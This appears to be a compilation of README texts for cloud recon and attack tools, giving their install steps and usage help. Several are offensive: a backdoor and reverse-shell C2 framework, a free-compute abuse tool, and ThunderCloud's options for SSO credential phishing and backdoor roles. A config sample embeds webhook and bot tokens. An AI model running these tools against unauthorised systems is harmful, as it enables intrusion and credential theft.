A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode). The outcome is useful for bug bounty hunters, red teamers, and penetration testers alike.
The complete writeup is available. here
we are always thinking of something we can automate to make black-box security testing easier. We discussed this idea of creating a multiple platform cloud brute-force hunter.mainly to find open buckets, apps, and databases hosted on the clouds and possibly app behind proxy servers.
Here is the list issues on previous approaches we tried to fix:
Microsoft: - Storage - Apps
Amazon: - Storage - Apps
Google: - Storage - Apps
DigitalOcean: - storage
Vultr: - Storage
Linode: - Storage
Alibaba: - Storage
1.0.0
Just download the latest release for your operation system and follow the usage.
To make the best use of this tool, you have to understand how to configure it correctly. When you open your downloaded version, there is a config folder, and there is a config.YAML file in there.
It looks like this
providers: ["amazon","alibaba","amazon","microsoft","digitalocean","linode","vultr","google"] # supported providers
environments: [ "test", "dev", "prod", "stage" , "staging" , "bak" ] # used for mutations
proxytype: "http" # socks5 / http
ipinfo: "" # IPINFO.io API KEY
For IPINFO API, you can register and get a free key at IPINFO, the environments used to generate URLs, such as test-keyword.target.region and test.keyword.target.region, etc.
We provided some wordlist out of the box, but it's better to customize and minimize your wordlists (based on your recon) before executing the tool.
After setting up your API key, you are ready to use CloudBrute.
โโโโโโโโโโ โโโโโโโ โโโ โโโโโโโโโโ โโโโโโโ โโโโโโโ โโโ โโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโ โโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโ
โโโ โโโ โโโ โโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโโโโ
โโโ โโโ โโโ โโโโโโ โโโโโโ โโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโ โโโ โโโโโโโโ
โโโโโโโโโโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโโโโโ โโโ โโโ โโโโโโโ โโโ โโโโโโโโ
V 1.0.7
usage: CloudBrute [-h|--help] -d|--domain "<value>" -k|--keyword "<value>"
-w|--wordlist "<value>" [-c|--cloud "<value>"] [-t|--threads
<integer>] [-T|--timeout <integer>] [-p|--proxy "<value>"]
[-a|--randomagent "<value>"] [-D|--debug] [-q|--quite]
[-m|--mode "<value>"] [-o|--output "<value>"]
[-C|--configFolder "<value>"]
Awesome Cloud Enumerator
Arguments:
-h --help Print help information
-d --domain domain
-k --keyword keyword used to generator urls
-w --wordlist path to wordlist
-c --cloud force a search, check config.yaml providers list
-t --threads number of threads. Default: 80
-T --timeout timeout per request in seconds. Default: 10
-p --proxy use proxy list
-a --randomagent user agent randomization
-D --debug show debug logs. Default: false
-q --quite suppress all output. Default: false
-m --mode storage or app. Default: storage
-o --output Output file. Default: out.txt
-C --configFolder Config path. Default: config
for example
CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt"
please note -k keyword used to generate URLs, so if you want the full domain to be part of mutation, you have used it for both domain (-d) and keyword (-k) arguments
If a cloud provider not detected or want force searching on a specific provider, you can use -c option.
CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt
Read the usage.
Make sure you read the usage correctly, and if you think you found a bug open an issue.
It's because you use public proxies, use private and higher quality proxies. You can use ProxyFor to verify the good proxies with your chosen provider.
change -T (timeout) option to get best results for your run.
Inspired by every single repo listed here .
The C2 Cloud is a robust web-based C2 framework, designed to simplify the life of penetration testers. It allows easy access to compromised backdoors, just like accessing an EC2 instance in the AWS cloud. It can manage several simultaneous backdoor sessions with a user-friendly interface.
C2 Cloud is open source. Security analysts can confidently perform simulations, gaining valuable experience and contributing to the proactive defense posture of their organizations.
Reverse shells support:
C2 Cloud walkthrough: https://youtu.be/hrHT_RDcGj8
Ransomware simulation using C2 Cloud: https://youtu.be/LKaCDmLAyvM
Telegram C2: https://youtu.be/WLQtF4hbCKk
๐ Anywhere Access: Reach the C2 Cloud from any location.
๐ Multiple Backdoor Sessions: Manage and support multiple sessions effortlessly.
๐ฑ๏ธ One-Click Backdoor Access: Seamlessly navigate to backdoors with a simple click.
๐ Session History Maintenance: Track and retain complete command and response history for comprehensive analysis.
๐ ๏ธ Flask: Serving web and API traffic, facilitating reverse HTTP(s) requests.
๐ TCP Socket: Serving reverse TCP requests for enhanced functionality.
๐ Nginx: Effortlessly routing traffic between web and backend systems.
๐จ Redis PubSub: Serving as a robust message broker for seamless communication.
๐ Websockets: Delivering real-time updates to browser clients for enhanced user experience.
๐พ Postgres DB: Ensuring persistent storage for seamless continuity.
Reverse TCP port: 8888
Clone the repo
Inspired by Villain, a CLI-based C2 developed by Panagiotis Chartas.
Distributed under the MIT License. See LICENSE for more information.
Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments
CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.
To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.
bash pip3 install -r requirements.txt
To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.
bash chmod +x clone.sh ./clone.sh
This tool offers a CLI (Command Line Interface). As such, here we review its use:
Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:
Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.
{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
"testTrails/AWSLogs/00000000/CloudTrail/us-west-1/2024/03/04"
]
},
{
"bucket": "aws-kosova-us-east-1-00000000"
}
],
"AZURE": [
{
"accountname": "logs",
"container": [
"cloudgrappler"
]
}
]
}
Run command
python3 main.py
python3 main.py -p
[+] Running GetFileDownloadUrls.*secrets_ for AWS
[+] Threat Actor: LUCR3
[+] Severity: MEDIUM
[+] Description: Review use of CloudShell. Permiso seldom witnesses use of CloudShell outside of known attackers.This however may be a part of your normal business use case.
python3 main.py -p -jo
reports
โโโ json
โโโ AWS
โย ย โโโ 2024-03-04 01:01 AM
โย ย โโโ cloudtrail-logs-00000000-ffffff--
โย ย โโโ testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03
โย ย โโโ GetFileDownloadUrls.*secrets_.json
โโโ AZURE
โโโ 2024-03-04 01:01 AM
โโโ logs
โโโ cloudgrappler
โโโ okta_key.json
python3 main.py -p -sd 2024-02-15 -ed 2024-02-16
python3 main.py -q "GetFileDownloadUrls.*secret", "UpdateAccessKey" -s '*'
python3 main.py -f new_file.json
Your system will need access to the S3 bucket. For example, if you are running on your laptop, you will need to configure the AWS CLI. If you are running on an EC2, an Instance Profile is likely the best choice.
If you run on an EC2 instance in the same region as the S3 bucket with a VPC endpoint for S3 you can avoid egress charges. You can authenticate in a number of ways.
The simplest way to authenticate with Azure is to first run:
az login
This will open a browser window and prompt you to login to Azure.
Multi-cloud OSINT tool. Enumerate public resources in AWS, Azure, and Google Cloud.
Currently enumerates the following:
Amazon Web Services: - Open / Protected S3 Buckets - awsapps (WorkMail, WorkDocs, Connect, etc.)
Microsoft Azure: - Storage Accounts - Open Blob Storage Containers - Hosted Databases - Virtual Machines - Web Apps
Google Cloud Platform - Open / Protected GCP Buckets - Open / Protected Firebase Realtime Databases - Google App Engine sites - Cloud Functions (enumerates project/regions with existing functions, then brute forces actual function names) - Open Firebase Apps
See it in action in Codingo's video demo here.
Several non-standard libaries are required to support threaded HTTP requests and dns lookups. You'll need to install the requirements as follows:
pip3 install -r ./requirements.txt
The only required argument is at least one keyword. You can use the built-in fuzzing strings, but you will get better results if you supply your own with -m
and/or -b
.
You can provide multiple keywords by specifying the -k
argument multiple times.
Keywords are mutated automatically using strings from enum_tools/fuzz.txt
or a file you provide with the -m
flag. Services that require a second-level of brute forcing (Azure Containers and GCP Functions) will also use fuzz.txt
by default or a file you provide with the -b
flag.
Let's say you were researching "somecompany" whose website is "somecompany.io" that makes a product called "blockchaindoohickey". You could run the tool like this:
./cloud_enum.py -k somecompany -k somecompany.io -k blockchaindoohickey
HTTP scraping and DNS lookups use 5 threads each by default. You can try increasing this, but eventually the cloud providers will rate limit you. Here is an example to increase to 10.
./cloud_enum.py -k keyword -t 10
IMPORTANT: Some resources (Azure Containers, GCP Functions) are discovered per-region. To save time scanning, there is a "REGIONS" variable defined in cloudenum/azure_regions.py and cloudenum/gcp_regions.py
that is set by default to use only 1 region. You may want to look at these files and edit them to be relevant to your own work.
Complete Usage Details
usage: cloud_enum.py [-h] -k KEYWORD [-m MUTATIONS] [-b BRUTE]
Multi-cloud enumeration utility. All hail OSINT!
optional arguments:
-h, --help show this help message and exit
-k KEYWORD, --keyword KEYWORD
Keyword. Can use argument multiple times.
-kf KEYFILE, --keyfile KEYFILE
Input file with a single keyword per line.
-m MUTATIONS, --mutations MUTATIONS
Mutations. Default: enum_tools/fuzz.txt
-b BRUTE, --brute BRUTE
List to brute-force Azure container names. Default: enum_tools/fuzz.txt
-t THREADS, --threads THREADS
Threads for HTTP brute-force. Default = 5
-ns NAMESERVER, --nameserver NAMESERVER
DNS server to use in brute-force.
-l LOGFILE, --logfile LOGFILE
Will APPEND found items to specified file.
-f FORMAT, --format FORMAT
Format for log file (text,json,csv - defaults to text)
--disable-aws Disable Amazon checks.
--disable-azure Disable Azure checks.
--disable-gcp Disable Google checks.
-qs, --quickscan Disable all mutations and second-level scans
So far, I have borrowed from: - Some of the permutations from GCPBucketBrute
Execute code within Azure Automation service without getting charged
CloudMiner is a tool designed to get free computing power within Azure Automation service. The tool utilizes the upload module/package flow to execute code which is totally free to use. This tool is intended for educational and research purposes only and should be used responsibly and with proper authorization.
This flow was reported to Microsoft on 3/23 which decided to not change the service behavior as it's considered as "by design". As for 3/9/23, this tool can still be used without getting charged.
Each execution is limited to 3 hours
requirements.txt
pip install .
usage: cloud_miner.py [-h] --path PATH --id ID -c COUNT [-t TOKEN] [-r REQUIREMENTS] [-v]
CloudMiner - Free computing power in Azure Automation Service
optional arguments:
-h, --help show this help message and exit
--path PATH the script path (Powershell or Python)
--id ID id of the Automation Account - /subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Automation/a
utomationAccounts/{automationAccountName}
-c COUNT, --count COUNT
number of executions
-t TOKEN, --token TOKEN
Azure access token (optional). If not provided, token will be retrieved using the Azure CLI
-r REQUIREMENTS, --requirements REQUIREMENTS
Path to requirements file to be installed and use by the script (relevant to Python scripts only)
-v, --verbose Enable verbose mode
CloudMiner is released under the BSD 3-Clause License. Feel free to modify and distribute this tool responsibly, while adhering to the license terms.
To know more about our Attack Surface
Management platform, check out NVADR.
Finding assets from certificates! Scan the web! Tool presented @DEFCON 31
** You must have CGO enabled, and may have to install gcc to run CloudRecon**
sudo apt install gcc
go install github.com/g0ldencybersec/CloudRecon@latest
CloudRecon
CloudRecon is a suite of tools for red teamers and bug hunters to find ephemeral and development assets in their campaigns and hunts.
Often, target organizations stand up cloud infrastructure that is not tied to their ASN or related to known infrastructure. Many times these assets are development sites, IT product portals, etc. Sometimes they don't have domains at all but many still need HTTPs.
CloudRecon is a suite of tools to scan IP addresses or CIDRs (ex: cloud providers IPs) and find these hidden gems for testers, by inspecting those SSL certificates.
The tool suite is three parts in GO:
Scrape - A LIVE running tool to inspect the ranges for a keywork in SSL certs CN and SN fields in real time.
Store - a tool to retrieve IPs certs and download all their Orgs, CNs, and SANs. So you can have your OWN cert.sh database.
Retr - a tool to parse and search through the downloaded certs for keywords.
MAIN
Usage: CloudRecon scrape|store|retr [options]
-h Show the program usage message
Subcommands:
cloudrecon scrape - Scrape given IPs and output CNs & SANs to stdout
cloudrecon store - Scrape and collect Orgs,CNs,SANs in local db file
cloudrecon retr - Query local DB file for results
SCRAPE
scrape [options] -i <IPs/CIDRs or File>
-a Add this flag if you want to see all output including failures
-c int
How many goroutines running concurrently (default 100)
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE" )
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)
STORE
store [options] -i <IPs/CIDRs or File>
-c int
How many goroutines running concurrently (default 100)
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-i string
Either IPs & CIDRs separated by commas, or a file with IPs/CIDRs on each line (default "NONE")
-p string
TLS ports to check for certificates (default "443")
-t int
Timeout for TLS handshake (default 4)
RETR
retr [options]
-all
Return all the rows in the DB
-cn string
String to search for in common name column, returns like-results (default "NONE")
-db string
String of the DB you want to connect to and save certs! (default "certificates.db")
-h print usage!
-ip string
String to search for in IP column, returns like-results (default "NONE")
-num
Return the Number of rows (results) in the DB (By IP)
-org string
String to search for in Organization column, returns like-results (default "NONE")
-san string
String to search for in common name column, returns like-results (default "NONE")
CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield. Subdomain scanning is employed as a key technique in this pursuit. This tool is an invaluable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.
Key Features:
Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.
Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.
Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.
Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.
With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
- Still in the development phase, sometimes it can't detect the real Ip.
- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.
1. False Negatives: CloakReveal3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.
2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.
3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the pri mary host. Some subdomains may also be protected by Cloudflare.
How to Use:
Run CloudScan with a single command-line argument: the target domain you want to analyze.
git clone https://github.com/spyboy-productions/CloakQuest3r.git
cd CloakQuest3r
pip3 install -r requirements.txt
python cloakquest3r.py example.com
The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.
If Cloudflare is detected, CloudScan will scan for subdomains and identify their real IP addresses.
You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.
Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.
CloudScan simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.
Run it online on replit.com : https://replit.com/@spyb0y/CloakQuest3r
The purpose of the project is to create rate limit in AWS WaF based on HTTP headers.
Golang is a dependencie to build the binary. See the documentation to install: https://go.dev/doc/install
make
sudo make install
The rules configuration is very simple, for example, the threshold is the limited of the requests in X time. It's possible to monitoring multiples headers, but, the header needs to be in HTTP Request header log.
rules:
header:
x-api-id: # The header name in HTTP Request header
threshold: 100
token:
threshold: 1000
It's possible send notifications to Slack and Telegram. To configure slack notifications, you needs create a webhook configuration, see the slack documentation: https://api.slack.com/messaging/webhooks
Telegram bot father: https://t.me/botfather
notifications:
slack:
webhook-url: https://hooks.slack.com/services/DA2DA13QS/LW5DALDSMFDT5/qazqqd4f5Qph7LgXdZaHesXs
telegram:
bot-token: "123456789:NNDa2tbpq97izQx_invU6cox6uarhrlZDfa"
chat-id: "-4128833322"
To set up AWS credentials, it's advisable to export them as environment variables. Here's a recommended approach:
export AWS_ACCESS_KEY_ID=".."
export AWS_SECRET_ACCESS_KEY=".."
export AWS_REGION="us-east-1"
retrive-logs-minutes-ago is the time range you want to fetch the logs, in this example, logs from 1 hour ago.
aws:
waf-log-group-name: aws-waf-logs-cloudwatch-cloudfront
region: us-east-1
retrive-logs-minutes-ago: 60
During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.
Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find company's asset's on aws cloud:
1- Download CloudPulse :
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Run docker compose :
docker-compose up -d
3- Run script.py script
docker-compose exec web python script.py
4 - Now go to http://:8000/search and enjoy the search engine
1- download CloudPulse :
git clone https://github.com/yousseflahouifi/CloudPulse
cd CloudPulse/
2- Setup virtual environment :
python3 -m venv myenv
source myenv/bin/activate
3- Install requirements.txt file :
pip install -r requirements.txt
4- run an instance of elasticsearch using docker :
docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1
5- update script.py and settings file to the host 'localhost':
#script.py
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
#se/settings.py
ELASTICSEARCH_DSL = {
'default': {
'hosts': 'localhost:9200'
},
}
6- Run script.py to index data in elasticsearch:
python script.py
7- Run the app:
python manage.py runserver 0:8000
Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository clone the data and update data.csv file (it contains close to 9 millions data)
as an example searching for .mil data gives:
searching for tesla as en example gives :
CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.
GATOR - GCP Attack Toolkit for Offensive Research, a tool designed to aid in research and exploiting Google Cloud Environments. It offers a comprehensive range of modules tailored to support users in various attack stages, spanning from Reconnaissance to Impact.
Resource Category | Primary Module | Command Group | Operation | Description |
---|---|---|---|---|
User Authentication | auth | - | activate | Activate a Specific Authentication Method |
- | add | Add a New Authentication Method | ||
- | delete | Remove a Specific Authentication Method | ||
- | list | List All Available Authentication Methods | ||
Cloud Functions | functions | - | list | List All Deployed Cloud Functions |
- | permissions | Display Permissions for a Specific Cloud Function | ||
- | triggers | List All Triggers for a Specific Cloud Function | ||
Cloud Storage | storage | buckets | list | List All Storage Buckets |
permissions | Display Permissions for Storage Buckets | |||
Compute Engine | compute | instances | add-ssh-key | Add SSH Key to Compute Instances |
Python 3.11 or newer should be installed. You can verify your Python version with the following command:
python --version
git clone https://github.com/anrbn/GATOR.git
cd GATOR
python setup.py install
pip install gator-red
Have a look at the GATOR Documentation for an explained guide on using GATOR and it's module!
If you encounter any problems with this tool, I encourage you to let me know. Here are the steps to report an issue:
Check Existing Issues: Before reporting a new issue, please check the existing issues in this repository. Your issue might have already been reported and possibly even resolved.
Create a New Issue: If your problem hasn't been reported, please create a new issue in the GitHub repository. Click the Issues tab and then click New Issue.
Describe the Issue: When creating a new issue, please provide as much information as possible. Include a clear and descriptive title, explain the problem in detail, and provide steps to reproduce the issue if possible. Including the version of the tool you're using and your operating system can also be helpful.
Submit the Issue: After you've filled out all the necessary information, click Submit new issue.
Your feedback is important, and will help improve the tool. I appreciate your contribution!
I'll be reviewing reported issues on a regular basis and try to reproduce the issue based on your description and will communicate with you for further information if necessary. Once I understand the issue, I'll work on a fix.
Please note that resolving an issue may take some time depending on its complexity. I appreciate your patience and understanding.
I warmly welcome and appreciate contributions from the community! If you're interested in contributing on any existing or new modules, feel free to submit a pull request (PR) with any new/existing modules or features you'd like to add.
Once you've submitted a PR, I'll review it as soon as I can. I might request some changes or improvements before merging your PR. Your contributions play a crucial role in making the tool better, and I'm excited to see what you'll bring to the project!
Thank you for considering contributing to the project.
If you have any questions regarding the tool or any of its modules, please check out the documentation first. I've tried to provide clear, comprehensive information related to all of its modules. If however your query is not yet solved or you have a different question altogether please don't hesitate to reach out to me via Twitter or LinkedIn. I'm always happy to help and provide support. :)
Discover, prioritize, and remediate your risks in the cloud.
git clone --recurse-submodules git@github.com:Zeus-Labs/ZeusCloud.git
cd ZeusCloud && make quick-deploy
Check out our Get Started guide for more details.
A cloud-hosted version is available on special request - email founders@zeuscloud.io to get access!
Play around with our sandbox environment to see how ZeusCloud identifies, prioritizes, and remediates risks in the cloud!
Cloud usage continues to grow. Companies are shifting more of their workloads from on-prem to the cloud and both adding and expanding new and existing workloads in the cloud. Cloud providers keep increasing their offerings and their complexity. Companies are having trouble keeping track of their security risks as their cloud environment scales and grows more complex. Several high profile attacks have occurred in recent times. Capital One had an S3 bucket breached, Amazon had an unprotected Prime Video server breached, Microsoft had an Azure DevOps server breached, Puma was the victim of ransomware, etc.
We had to take action.
We love contributions of all sizes. What would be most helpful first:
Run containers in development mode:
cd frontend && yarn && cd -
docker-compose down && docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --build
Reset neo4j and/or postgres data with the following:
rm -rf .compose/neo4j
rm -rf .compose/postgres
To develop on frontend, make the the code changes and save.
To develop on backend, run
docker-compose -f docker-compose.dev.yaml --env-file .env.dev up --no-deps --build backend
To access the UI, go to: http://localhost:80.
Please do not run ZeusCloud exposed to the public internet. Use the latest versions of ZeusCloud to get all security related patches. Report any security vulnerabilities to founders@zeuscloud.io.
This repo is freely available under the Apache 2.0 license.
We're working on a cloud-hosted solution which handles deployment and infra management. Contact us at founders@zeuscloud.io for more information!
Special thanks to the amazing Cartography project, which ZeusCloud uses for its asset inventory. Credit to PostHog and Airbyte for inspiration around public-facing materials - like this README!
GVision is a reverse image search app that use Google Cloud Vision API to detect landmarks and web entities from images, helping you gather valuable information quickly and easily.
Google Cloud Vision API is a machine learning-powered image analysis service that provides developers with tools to understand the contents of an image. It can detect objects, faces, text, logos, and more within an image.
Before using the app, you need to obtain a Google Cloud Vision API key.
Upload a config file
button in the sidebar.To install the dependencies, simply run the following command:
pip install -r requirements.txt
You can run the app locally by running the following command:
streamlit run gvision.py
Using GVision is simple and straightforward:
Upload a config file
button in the sidebar.Choose an image
button.You can also find links to the Google Cloud Vision API documentation and pricing in the Resources
section of the sidebar.
To reset the app to its default state or to clear the uploaded image and results, click on the Reset app
button.
Cloud Exploit Framework
python3 tc.py -h
_______ _ _ _____ _ _
|__ __| | | | / ____| | | |
| | | |__ _ _ _ __ __| | ___ _ __| | | | ___ _ _ __| |
| | | '_ \| | | | '_ \ / _` |/ _ \ '__| | | |/ _ \| | | |/ _` |
| | | | | | |_| | | | | (_| | __/ | | |____| | (_) | |_| | (_| |
\_/ |_| |_|\__,_|_| |_|\__,_|\___|_| \_____|_|\___/ \__,_|\__,_|
usage: tc.py [-h] [-ce COGNITO_ENDPOINT] [-reg REGION] [-accid AWS_ACCOUNT_ID] [-aws_key AWS_ACCESS_KEY] [-aws_secret AWS_SECRET_KEY] [-bdrole BACKDOOR_ROLE] [-sso SSO_URL] [-enum_roles ENUMERATE_ROLES] [-s3 S3_BUCKET_NAME]
[-conn_string CONNECTION_STRING] [-blob BLOB] [-shared_access_key SHARED_ACCESS_KEY]
Attack modules of cloud AWS
optional arguments:
-h, --help show this help message and exit
-ce COGNITO_ENDPOINT, --cognito_endpoint COGNITO_ENDPOINT
to verify if cognito endpoint is vulnerable and to extract credentials
-reg REGION, --region REGION
AWS region of the resource
-accid AWS_ACCOUNT_ID, --aws_account_id AWS_ACCOUNT_ID
AWS account of the victim
-aws_key AWS_ACCESS_KEY, --aws_access_key AWS_ACCESS_KEY
AWS access keys of the victim account
-aws_secret AWS_SECRET_KEY, --aws_secret_key AWS_SECRET_KEY
AWS secret key of the victim account
-bdrole BACKDOOR_ROLE, --backdoor_role BACKDOOR_ROLE
Name of the backdoor role in victim role
-sso SSO_URL, --sso_url SSO_URL
AWS SSO URL to phish for AWS credentials
-enum_roles ENUMERATE_ROLES, --enumerate_roles ENUMERATE_ROLES
To enumerate and assume account roles in victim AWS roles
-s3 S3_BUCKET_NAME, --s3_bucket_name S3_BUCKET_NAME
Execute upload attack on S3 bucket
-conn_string CONNECTION_STRING, --connection_string CONNECTION_STRING
Azure Shared Access key for readingservicebus/queues/blobs etc
-blob BLOB, --blob BLOB
Azure blob enumeration
-shared_access_key SHARED_ACCESS_KEY, --shared_access_key SHARED_ACCESS_KEY
Azure shared key
* python 3
* pip
* git
- get project `git clone https://github.com/Rnalter/ThunderCloud.git && cd ThunderCloud/`
- install [virtualenv](https://virtualenv.pypa.io/en/latest/) `pip install virtualenv`
- create a python 3.6 local enviroment `virtualenv -p python3.6 venv`
- activate the virtual enviroment `source venv/bin/activate`
- install project dependencies `pip install -r requirements.txt`
- run the tool via `python tc.py --help`
Examples
python3 tc.py -sso <sso_url> --region <region>
python3 tc.py -ce <cognito_endpoint> --region <region>